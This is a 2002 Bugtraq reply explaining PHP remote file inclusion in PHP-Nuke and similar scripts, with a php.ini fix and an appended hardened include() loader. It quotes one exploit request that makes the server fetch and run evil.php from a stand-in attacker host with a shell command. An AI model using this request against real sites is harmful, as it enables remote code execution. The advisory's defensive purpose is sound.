[23924] in bugtraq


Re: PHP-Nuke allows Command Execution & Much more

daemon@ATHENA.MIT.EDU (truff)
Tue Jan 22 00:01:51 2002

Message-ID: <3C4C1B01.FEF66E24@ifrance.com>
Date: Mon, 21 Jan 2002 14:43:29 +0100
From: truff <truff@ifrance.com>
Reply-To: truff@projet7.org
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

>Hi All!
>
>  I've found a serious security flaw in PHP-Nuke.
>  It allows user to execute any PHP code.
>  .....
>  Then just requesting
>  http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
>  .......

Hello,

    I used to find this flaw in a lot of _home made_ scripts. This is
due to the use of the include() function with user-passed parameters,
and it is not particular to phpnuke. It exists in a lot of scripts because
the php default config allows passing http:// and ftp:// parameters to
functions like include().

As it is said in the php manual:

"As long as support for the "URL fopen wrapper" is enabled when you
configure PHP (which it is unless you explicitly pass the
--disable-url-fopen-wrapper flag to configure (for versions up to 4.0.3)
or set allow_url_fopen to off in php.ini (for newer versions)), you can
use HTTP and FTP URLs with most functions that take a filename as a
parameter, including the require() and include() statements."

Quick Fix:
    Just set allow_url_fopen to off in php.ini.


    - www.projet7.org -  Security Researchs
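
The include() pattern described in the message above, next to a hardened form, as an added example that is not part of the original post and is not PHP-Nuke code. The page names, paths and the resolve_page() helper are hypothetical.

```php
<?php
// Added example: hypothetical page loader, not taken from PHP-Nuke.

// Pattern the post describes: request input goes straight to include().
// With URL wrappers enabled, an http:// or ftp:// value is fetched and
// executed as PHP on this server.
//     include($_GET['file']);

// Hardened form: the request only selects a key; the path comes from a
// fixed map, so no user-supplied string ever reaches include().
const PAGES = [                 // hypothetical page names and paths
    'home'  => 'pages/home.php',
    'news'  => 'pages/news.php',
    'about' => 'pages/about.php',
];

function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (file[]=x) and other non-strings are rejected outright,
    // as is any key that is not in the allow-list.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // realpath() collapses ../ and symlinks; false means the file is missing.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved file must still sit under the base dir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['file'] ?? 'home', __DIR__);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

On PHP 5.2 and later, URL arguments to include() and require() are controlled by the separate allow_url_include setting, which is off by default.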



 